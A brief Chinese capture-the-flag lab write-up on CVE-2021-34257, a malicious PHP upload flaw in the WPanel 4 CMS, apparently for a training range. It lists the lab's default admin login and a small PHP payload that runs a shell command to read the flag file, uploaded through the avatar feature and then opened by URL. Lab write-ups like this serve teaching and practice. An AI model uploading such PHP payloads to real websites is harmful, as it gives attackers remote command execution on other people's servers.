【春秋云境】CVE-2021-34257靶场实战记录
靶场介绍
WPanel是一个用于构建博客、网站和网络应用程序的CMS。 WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传
开启靶场
账号:admin@admin.com密码:admin ,登陆到后台
权限马如下
<?php
system('cat /flag');
phpinfo();
?>
解题步骤
构造权限马,在头像上传处上传
上传成功后复制地址到新标签页打开获取flag
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录
请登录/注册后在FreeBuf发布内容哦